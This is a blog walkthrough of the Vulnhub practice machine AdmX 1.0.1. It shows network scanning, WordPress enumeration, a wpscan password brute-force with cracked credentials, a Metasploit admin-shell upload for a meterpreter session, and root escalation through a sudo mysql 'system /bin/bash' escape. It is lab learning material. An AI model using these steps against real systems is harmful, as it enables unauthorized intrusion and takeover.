NepCodeX

Byte Musings: Where Tech Meets Curiosity


AdmX 1.0.1 Walkthrough – Vulnhub – Writeup

apache default page admx 1.0.1 vulnhub walkthrough writeup

In this post, I am going to do the walkthrough of the machine AdmX 1.0.1 from Vulnhub. I intend to write this writeup for those who have intermediate skills in hacking. Before starting into the walkthrough, I would like to say that the machine didn’t work on my VirtualBox but VMWare only.

Link to the machine: https://www.vulnhub.com/entry/admx-101,694/

Prime (2021) 2: Walkthrough – Vulnhub – Writeup

Identify the target

Firstly, I had to identify the target. Hence, I used netdiscover to list down the hosts on the network.

sudo netdiscover -i eth0 -r 19.168.19.0/24  
image 313

Scan open ports

Next, I listed the open ports that would show exposed services.

nmap -T4 -sC -sV -p- --min-rate=1000 192.168.19.136 | tee nmapscan
image 314

Directory enumeration

We only have an open http port on the target with default apache page. Therefore, I did the directory enumeration.

gobuster dir -u http://192.168.19.136 -x html,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt 
image 315

The path that I have highlighted has an installation of wordpress.

image 316

Enumerate wordpress

Since we know that the website has wordpress, I futher dug deeper using wpscan.

wpscan --api-token $WPSCAN_KEY --url http://192.168.19.136/wordpress --detection-mode aggressive -e 
image 317

Although, it says it found a vulnerability, I couldn’t make it work even by changing the code of the exploit. Hence, I decided to try bruteforce on the user admin using the wordlist rockyou.txt.

wpscan --url http://192.168.19.136/wordpress -U admin -P /home/kali/rockyou.txt
image 318

It took around 11 minutes to crack the password of admin.

wordpress credentials
user: admin
pass: adam14

Spawn reverse shell

Now, I like to spawn a reverse shell by injecting the php code. Because the website has issue in the host name, I decided to use msfconsole to upload admin shell.

msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set username admin
set password adam14
set rhosts 192.168.19.136
set targeturi /wordpress
run
image 319

Finally, I got the meterpreter shell. Now, I can switch to linux shell using shell -t.

image 320

Privilege escalation to user

We can see the list of users by either using /etc/passwd file or if the user has access by listing down the /home directory.

image 321

Now, we can check if the user has reused the wordpress password.

image 322

It seems as if the user has reused the password. However, if it were not the case, then you could have looked into mysql credentials if those could give us access.

image 323

We got the user flag. Now, we can proceed to get the root shell.

Privilege escalation to root

Firstly, I looked into the sudoers permission of the user.

sudo -l
image 324

Here, we can see that the user can run the root commands on mysql’s wordpress database which prompts for password (because of -p option).

sudo mysql -u root -D wordpress -p
image 325

So now, I am using mysql as root user, I need a way to execute shell commands using mysql.

Mysql allows execution of shell commands in *nix system by using keyword system.

system /bin/bash -i
image 326
cd /root
ls -al
cat proof.txt
image 327

Finally, we got the root flag.

Conclusion

Although the description says, AdmX 1.0.1 is an easy/intermediate machine, I found it easy. I don’t know if it would happen in a real certification examination where the WordPress site would have a hard-coded ip address that would make it difficult to inject shellcodes. Other than the certification purpose, for a boot-to-root challenge, it isn’t an issue at all.



0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments